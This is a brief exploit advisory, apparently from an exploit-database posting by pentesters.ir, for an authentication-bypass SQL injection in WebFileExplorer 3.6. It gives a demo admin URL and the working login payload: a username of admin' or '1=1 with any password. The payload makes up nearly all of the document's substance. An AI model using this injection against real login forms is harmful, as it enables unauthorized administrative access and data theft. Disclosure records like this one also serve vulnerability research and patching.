In The Name Of GOD # Exploit Title: WebFileExplorer 3.6 (Auth Bypass) SQL Injection Vulnerability # Date: 2011-06-12 # Author: pentesters.ir # Software Link: http://www.webfileexplorer.com/ # Version: 3.6 # Price: 99$ # Contact : Cru3l.b0y@gmail.com # Website : http://pentesters.ir/forum/ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit: go to demo here: http://www.webfileexplorer.com/admindemo/ user: admin' or '1=1 pass: anything